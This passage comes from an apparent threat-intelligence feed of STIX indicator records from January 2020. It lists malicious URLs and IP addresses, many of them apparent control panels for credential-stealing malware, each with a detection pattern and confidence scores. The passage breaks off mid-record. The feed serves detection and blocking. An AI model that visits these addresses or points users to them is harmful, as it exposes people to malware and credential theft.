+{"created":"2020-01-22T02:59:25.626Z","description":"TS ID: 55241332291; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--76c01735-fb76-463d-9609-9ea3aedf3f4f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-01-22T02:59:25.626Z","name":"mal_url: http://f0390764.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0390764.xsph.ru/login']","type":"indicator","valid_from":"2020-01-22T02:59:25.626Z"} +{"created":"2020-01-22T02:59:36.461Z","description":"TS ID: 55241332343; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--e0a812dc-63c8-4949-b038-2241b2dbfcdc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-01-22T02:59:36.461Z","name":"mal_ip: 45.143.138.39","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '45.143.138.39']","type":"indicator","valid_from":"2020-01-22T02:59:36.461Z"} +{"created":"2020-01-22T02:59:41.193Z","description":"TS ID: 55241332316; iType: mal_url; State: active; Org: Sksa Technology Sdn Bhd; Source: CyberCrime","id":"indicator--6f0d8607-21cb-4738-9712-f4fd91a37f7d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-22T02:59:41.193Z","name":"mal_url: http://aglfreight.com.my/inc/js/jstree/biu/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://aglfreight.com.my/inc/js/jstree/biu/panel/admin.php']","type":"indicator","valid_from":"2020-01-22T02:59:41.193Z"} +{"created":"2020-01-22T02:59:41.228Z","description":"TS ID: 55241332284; iType: mal_url; State: active; Org: Oltelecom Jsc; Source: CyberCrime","id":"indicator--c649d6d4-87c4-4b76-bfc2-75a509ccb187","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-61"],"modified":"2020-01-22T02:59:41.228Z","name":"mal_url: http://95.182.122.184/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://95.182.122.184/']","type":"indicator","valid_from":"2020-01-22T02:59:41.228Z"} +{"created":"2020-01-22T02:59:51.313Z","description":"TS ID: 55241332337; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--408ebd2d-063f-4646-b2e7-c00519869736","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-62"],"modified":"2020-01-22T02:59:51.313Z","name":"mal_ip: 198.54.115.121","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '198.54.115.121']","type":"indicator","valid_from":"2020-01-22T02:59:51.313Z"} +{"created":"2020-01-22T02:59:51.372Z","description":"TS ID: 55241332324; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--e1d215cb-c7a5-40e0-bc53-8f92a2bcaba8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-38"],"modified":"2020-01-22T02:59:51.372Z","name":"mal_ip: 192.185.119.172","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '192.185.119.172']","type":"indicator","valid_from":"2020-01-22T02:59:51.372Z"} +{"created":"2020-01-22T02:59:51.442Z","description":"TS ID: 55241332296; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--6f3a4a2b-62e3-48ef-94ae-70103f09cf7e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-61"],"modified":"2020-01-22T02:59:51.442Z","name":"mal_url: http://f0389246.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0389246.xsph.ru/login']","type":"indicator","valid_from":"2020-01-22T02:59:51.442Z"} +{"created":"2020-01-22T03:00:01.563Z","description":"TS ID: 55241332400; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--213519c9-f511-4188-89c8-159f35f08008","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-66"],"modified":"2020-01-22T03:00:01.563Z","name":"mal_url: http://appareluea.com/server/cp.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://appareluea.com/server/cp.php']","type":"indicator","valid_from":"2020-01-22T03:00:01.563Z"} +{"created":"2020-01-22T03:00:03.138Z","description":"TS ID: 55241332396; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--5a563c85-c528-4e33-babe-2dcff34f73c4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-01-22T03:00:03.138Z","name":"mal_url: http://nkpotu.xyz/Kpot2/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nkpotu.xyz/Kpot2/login.php']","type":"indicator","valid_from":"2020-01-22T03:00:03.138Z"} +{"created":"2020-01-22T03:00:03.396Z","description":"TS ID: 55241332363; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--f3e33aab-e2af-4c15-8cb9-f008a37cf986","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-22T03:00:03.396Z","name":"mal_url: http://chol.cc/Work5/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://chol.cc/Work5/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T03:00:03.396Z"} +{"created":"2020-01-22T03:00:03.642Z","description":"TS ID: 55241332320; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--f03f098d-2fa9-49e1-a7dd-02518aa105fa","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-22T03:00:03.642Z","name":"mal_url: http://mecharnise.ir/ca4/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mecharnise.ir/ca4/panel/admin.php']","type":"indicator","valid_from":"2020-01-22T03:00:03.642Z"} +{"created":"2020-01-22T03:00:27.534Z","description":"TS ID: 55241332367; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--e72e3ba0-7de5-46bb-ab1e-efdf3e0a0b3b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-22T03:00:27.534Z","name":"mal_url: http://chol.cc/Work4/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://chol.cc/Work4/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T03:00:27.534Z"} +{"created":"2020-01-22T03:00:27.591Z","description":"TS ID: 55241332317; iType: mal_url; State: active; Org: SoftLayer Technologies; Source: CyberCrime","id":"indicator--d6b59b66-5020-4368-85a7-196026856ea9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-78"],"modified":"2020-01-22T03:00:27.591Z","name":"mal_url: http://kironofer.com/webpanel/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://kironofer.com/webpanel/login.php']","type":"indicator","valid_from":"2020-01-22T03:00:27.591Z"} +{"created":"2020-01-22T03:00:45.787Z","description":"TS ID: 55241332309; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--aff7b07f-acc7-4bec-ab19-1fce972bfd09","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-01-22T03:00:45.787Z","name":"mal_url: http://worldatdoor.in/panel2/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://worldatdoor.in/panel2/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T03:00:45.787Z"} +{"created":"2020-01-22T03:00:45.841Z","description":"TS ID: 55241332286; iType: mal_url; State: active; Org: Garanntor-Hosting; Source: CyberCrime","id":"indicator--ba71ba3a-1efd-40da-ab0d-f4397d6fc337","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-01-22T03:00:45.841Z","name":"mal_url: http://smartlinktelecom.top/kings/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://smartlinktelecom.top/kings/panel/admin.php']","type":"indicator","valid_from":"2020-01-22T03:00:45.841Z"} +{"created":"2020-01-22T03:00:45.959Z","description":"TS ID: 55241332339; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--17777e7f-3e91-4446-a43d-79139de8a948","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-64"],"modified":"2020-01-22T03:00:45.959Z","name":"mal_url: http://carirero.net/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://carirero.net/login.php']","type":"indicator","valid_from":"2020-01-22T03:00:45.959Z"} +{"created":"2020-01-22T03:00:46.025Z","description":"TS ID: 55241332319; iType: mal_ip; State: active; Org: SoftLayer Technologies; Source: CyberCrime","id":"indicator--f6be1804-cfe4-4f41-9338-2b65f5b1dda1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-30"],"modified":"2020-01-22T03:00:46.025Z","name":"mal_ip: 74.116.84.20","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '74.116.84.20']","type":"indicator","valid_from":"2020-01-22T03:00:46.025Z"} +{"created":"2020-01-22T03:00:57.729Z","description":"TS ID: 55241332305; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--b4fd8489-9589-4f70-996c-84989245a21b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-43"],"modified":"2020-01-22T03:00:57.729Z","name":"mal_url: http://tuu.nu/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://tuu.nu/login']","type":"indicator","valid_from":"2020-01-22T03:00:57.729Z"} +{"created":"2020-01-22T03:01:02.696Z","description":"TS ID: 55241332346; iType: mal_url; State: active; Org: Ifx Networks Colombia; Source: CyberCrime","id":"indicator--bc50c62f-a015-4460-87df-2137626877e3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-36"],"modified":"2020-01-22T03:01:02.696Z","name":"mal_url: http://dulfix.com/cgi-bins/dulfix/gustav57/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://dulfix.com/cgi-bins/dulfix/gustav57/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T03:01:02.696Z"} +{"created":"2020-01-22T03:01:02.807Z","description":"TS ID: 55241332323; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--2765af4b-bfb7-4ac8-82d2-ab6ed8a52461","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-65"],"modified":"2020-01-22T03:01:02.807Z","name":"mal_url: http://deliciasdvally.com.pe/includes/gter/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://deliciasdvally.com.pe/includes/gter/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T03:01:02.807Z"} +{"created":"2020-01-22T03:01:24.81Z","description":"TS ID: 55241332399; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--9c0e63a1-c32a-470a-bf09-51488e239c63","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-01-22T03:01:24.81Z","name":"mal_url: http://nkpotu.xyz/Kpot1/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nkpotu.xyz/Kpot1/login.php']","type":"indicator","valid_from":"2020-01-22T03:01:24.81Z"} +{"created":"2020-01-22T03:01:41.158Z","description":"TS ID: 55241332328; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime","id":"indicator--8047678e-20be-4116-9bc4-7bb7c26554e0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-22T03:01:41.158Z","name":"mal_ip: 194.87.147.80","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '194.87.147.80']","type":"indicator","valid_from":"2020-01-22T03:01:41.158Z"} +{"created":"2020-01-22T03:01:57.189Z","description":"TS ID: 55241332377; iType: mal_url; State: active; Org: A100 ROW GmbH; Source: CyberCrime","id":"indicator--c57a880c-1ce0-45de-9bab-fb2910454a61","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-01-22T03:01:57.189Z","name":"mal_url: http://35.158.92.3/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://35.158.92.3/panel/admin.php']","type":"indicator","valid_from":"2020-01-22T03:01:57.189Z"} +{"created":"2020-01-22T03:01:57.279Z","description":"TS ID: 55241332101; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--6056152c-0fa5-4e34-871a-3c8990f1ee46","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-42"],"modified":"2020-01-22T03:01:57.279Z","name":"mal_ip: 45.95.168.70","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '45.95.168.70']","type":"indicator","valid_from":"2020-01-22T03:01:57.279Z"} +{"created":"2020-01-22T03:02:50.57Z","description":"TS ID: 55241332357; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--23215acb-4989-4434-ac6d-8f9367734f0f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-22T03:02:50.57Z","name":"mal_url: http://chol.cc/Work7/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://chol.cc/Work7/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T03:02:50.57Z"} +{"created":"2020-01-22T03:02:52.496Z","description":"TS ID: 55241332289; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--452ece92-9ff2-4f99-8a7f-fd614ebea8cf","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-26"],"modified":"2020-01-22T03:02:52.496Z","name":"mal_url: http://f0391600.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0391600.xsph.ru/login']","type":"indicator","valid_from":"2020-01-22T03:02:52.496Z"} +{"created":"2020-01-22T03:03:42.819Z","description":"TS ID: 55241332334; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--10958d74-ec60-41af-a1ab-1613257e670f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-01-22T03:03:42.819Z","name":"mal_url: http://extraclick.space/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://extraclick.space/login.php']","type":"indicator","valid_from":"2020-01-22T03:03:42.819Z"} +{"created":"2020-01-22T03:03:52.044Z","description":"TS ID: 55241332326; iType: mal_url; State: active; Org: RUCloud; Source: CyberCrime","id":"indicator--19556daa-6293-400d-8706-d0baa6b16b7a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-22T03:03:52.044Z","name":"mal_url: http://petrogarmani.pw/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://petrogarmani.pw/login.php']","type":"indicator","valid_from":"2020-01-22T03:03:52.044Z"} +{"created":"2020-01-22T03:04:01.65Z","description":"TS ID: 55241332311; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--b09d9be9-6703-4a7d-a066-2baebb6418fc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-01-22T03:04:01.65Z","name":"mal_url: http://worldatdoor.in/mighty/32/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://worldatdoor.in/mighty/32/panel/admin.php']","type":"indicator","valid_from":"2020-01-22T03:04:01.65Z"} +{"created":"2020-01-22T03:04:32.717Z","description":"TS ID: 55241332341; iType: mal_url; State: active; Org: Institute of Philosophy, Russian Academy of Scienc; Source: CyberCrime","id":"indicator--43febf7d-4185-4a12-a868-e7be690b14aa","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-92"],"modified":"2020-01-22T03:04:32.717Z","name":"mal_url: http://zanlma.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://zanlma.com/login']","type":"indicator","valid_from":"2020-01-22T03:04:32.717Z"} +{"created":"2020-01-22T03:04:56.858Z","description":"TS ID: 55241332303; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--a34728e6-f91d-47e6-a4d8-a69176299e45","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-01-22T03:04:56.858Z","name":"mal_url: http://f0369688.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0369688.xsph.ru/login']","type":"indicator","valid_from":"2020-01-22T03:04:56.858Z"} +{"created":"2020-01-22T03:04:59.245Z","description":"TS ID: 55241332380; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--ac821704-5eb2-4f8f-a8b6-2a168dbd0e54","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-22T03:04:59.245Z","name":"mal_url: http://chol.cc/Work2/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://chol.cc/Work2/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T03:04:59.245Z"} +{"created":"2020-01-23T03:00:22.287Z","description":"TS ID: 55245868747; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--0d3e1bd8-0f16-4c22-b8a1-663ec255ad79","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-57"],"modified":"2020-01-23T03:00:22.287Z","name":"mal_ip: 192.185.214.199","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '192.185.214.199']","type":"indicator","valid_from":"2020-01-23T03:00:22.287Z"} +{"created":"2020-01-23T03:01:11.329Z","description":"TS ID: 55245868770; iType: mal_url; State: active; Org: Mills College; Source: CyberCrime","id":"indicator--2cdd130a-c884-402d-b63c-e03f9448f5d9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-24"],"modified":"2020-01-23T03:01:11.329Z","name":"mal_url: http://softtouchcollars.com/Loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://softtouchcollars.com/Loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-23T03:01:11.329Z"} +{"created":"2020-01-23T03:01:36.682Z","description":"TS ID: 55245868769; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--88e98e13-4bfd-4188-941a-f696a7b86b71","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-61"],"modified":"2020-01-23T03:01:36.682Z","name":"mal_url: http://imobiliariatirol.com/gh/panelnew/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://imobiliariatirol.com/gh/panelnew/admin.php']","type":"indicator","valid_from":"2020-01-23T03:01:36.682Z"} +{"created":"2020-01-23T03:02:15.854Z","description":"TS ID: 55245868772; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--27323b7d-85d3-4e89-8249-b7696925a772","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-01-23T03:02:15.854Z","name":"mal_url: http://deliveryexpressworld.xyz/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://deliveryexpressworld.xyz/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-23T03:02:15.854Z"} +{"created":"2020-01-23T03:02:47.364Z","description":"TS ID: 55245868766; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--b0639721-de55-48c6-b237-3859d61aecfb","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-62"],"modified":"2020-01-23T03:02:47.364Z","name":"mal_url: http://f0392261.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0392261.xsph.ru/login']","type":"indicator","valid_from":"2020-01-23T03:02:47.364Z"} +{"created":"2020-01-23T03:03:05.048Z","description":"TS ID: 55245868749; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--677e714d-c237-42a1-b6b7-9145acd13eee","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-80"],"modified":"2020-01-23T03:03:05.048Z","name":"mal_url: http://104.168.99.168/panel/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://104.168.99.168/panel/panel/admin.php']","type":"indicator","valid_from":"2020-01-23T03:03:05.048Z"} +{"created":"2020-01-23T03:03:15.734Z","description":"TS ID: 55245868767; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--5baa1dbd-d74e-408c-92b5-0a9f97e4b87a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-69"],"modified":"2020-01-23T03:03:15.734Z","name":"mal_url: http://f0387404.xsph.ru/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0387404.xsph.ru/panel/admin.php']","type":"indicator","valid_from":"2020-01-23T03:03:15.734Z"} +{"created":"2020-01-23T03:03:42.599Z","description":"TS ID: 55245868768; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--4563241e-5d2f-41a7-adb9-3925a5eeb1b1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-01-23T03:03:42.599Z","name":"mal_url: http://a0386457.xsph.ru/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://a0386457.xsph.ru/panel/admin.php']","type":"indicator","valid_from":"2020-01-23T03:03:42.599Z"} +{"created":"2020-01-24T02:57:04.821Z","description":"TS ID: 55250078037; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--70cb5d42-91d3-4efe-8c47-995fc0ac4141","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-01-24T02:57:04.821Z","name":"mal_url: http://defenseisrael.com/dis/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://defenseisrael.com/dis/index.php']","type":"indicator","valid_from":"2020-01-24T02:57:04.821Z"} +{"created":"2020-01-24T02:57:04.857Z","description":"TS ID: 55250078030; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime","id":"indicator--3aa712bb-b5d4-4632-bf50-48a4aeeaeb6d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-24T02:57:04.857Z","name":"mal_ip: 91.215.170.249","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '91.215.170.249']","type":"indicator","valid_from":"2020-01-24T02:57:04.857Z"} +{"created":"2020-01-24T02:57:04.883Z","description":"TS ID: 55250078019; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--64227c7d-86ea-4146-a868-3decb5aa5f1d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-01-24T02:57:04.883Z","name":"mal_url: http://lbfb3f03.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://lbfb3f03.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-01-24T02:57:04.883Z"} +{"created":"2020-01-24T02:57:12.997Z","description":"TS ID: 55250078035; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--37fcf9a7-1a90-4d81-be0a-e824a4fa938e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-01-24T02:57:12.997Z","name":"mal_url: http://byedtronchgroup.yt/jik/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://byedtronchgroup.yt/jik/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-24T02:57:12.997Z"} +{"created":"2020-01-24T02:57:13.025Z","description":"TS ID: 55250078008; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--5a38786f-107e-4060-a7c9-ea8a5ded6aac","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-24T02:57:13.025Z","name":"mal_url: http://199.192.28.11/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://199.192.28.11/panel/admin.php']","type":"indicator","valid_from":"2020-01-24T02:57:13.025Z"} +{"created":"2020-01-24T02:57:32.901Z","description":"TS ID: 55250078038; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--3eb79b31-1d6d-438c-a848-24a3407f6e32","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-24T02:57:32.901Z","name":"mal_url: http://217.8.117.51/aW8bVds1/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://217.8.117.51/aW8bVds1/login.php']","type":"indicator","valid_from":"2020-01-24T02:57:32.901Z"} +{"created":"2020-01-24T02:57:32.929Z","description":"TS ID: 55250078026; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--a050832c-db6e-49a0-8470-7a3cd8f17178","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-01-24T02:57:32.929Z","name":"mal_url: http://lansome.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://lansome.site/login']","type":"indicator","valid_from":"2020-01-24T02:57:32.929Z"} +{"created":"2020-01-24T02:57:49.028Z","description":"TS ID: 55250078034; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime","id":"indicator--e88008f4-76fc-428d-831a-4b389e48b712","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-24T02:57:49.028Z","name":"mal_url: http://iplusvietnam.com.vn/jo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://iplusvietnam.com.vn/jo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-24T02:57:49.028Z"} +{"created":"2020-01-24T02:58:03.345Z","description":"TS ID: 55250078032; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--dafe91cf-787c-471c-9afe-f7bb20a1b93f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-01-24T02:58:03.345Z","name":"mal_url: http://leakaryadeen.com/parl/id345/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://leakaryadeen.com/parl/id345/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-24T02:58:03.345Z"} +{"created":"2020-01-24T02:58:16.318Z","description":"TS ID: 55250078031; iType: mal_url; State: active; Org: IT House, Ltd; Source: 